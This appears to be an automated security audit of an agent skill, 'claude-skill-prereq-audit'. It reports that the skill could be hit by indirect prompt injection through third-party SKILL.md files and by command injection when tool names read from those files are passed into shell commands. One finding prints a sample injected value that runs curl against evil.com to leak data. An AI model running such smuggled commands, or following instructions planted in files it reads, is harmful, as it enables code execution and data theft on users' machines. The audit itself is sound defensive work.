claude-skill-prereq-audit

Warn

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it ingests and processes data from external SKILL.md files located in the user's home directory.
  • Ingestion points: Phases 1 and 2 glob and read all SKILL.md files from ~/.claude/skills/ and .claude/skills/.
  • Boundary markers: No delimiters or warnings are used to differentiate between system instructions and content parsed from potentially malicious third-party files.
  • Capability inventory: High-privilege shell access including brew install, gh extension install, and tool execution for authentication checks.
  • Sanitization: No sanitization or validation of the extracted tokens (CLI tool names or MCP server names) is performed before they are interpolated into shell commands.
  • [COMMAND_EXECUTION]: The skill constructs and executes shell commands using strings parsed directly from external files, creating a significant risk of command injection.
  • Evidence: In Phases 3 and 5, the skill executes `command -v`, `auth status`, and `brew install` with an argument (the tool or server name) extracted from third-party Markdown files. A malicious skill could provide a tool name containing shell metacharacters (e.g., '; curl evil.com/leak') to trigger arbitrary code execution.
  • [EXTERNAL_DOWNLOADS]: The skill performs remote installations and searches for software from external sources.
  • Evidence: Phase 5 attempts to install missing software using brew install and gh extension install based on contents found in local files. It also suggests searching the web for installation instructions if a tool is not found in Homebrew.
Audit Metadata
Risk Level: MEDIUM
Analyzed: Apr 22, 2026, 01:27 AM
Security Audit — agent-trust-hub — claude-skill-prereq-audit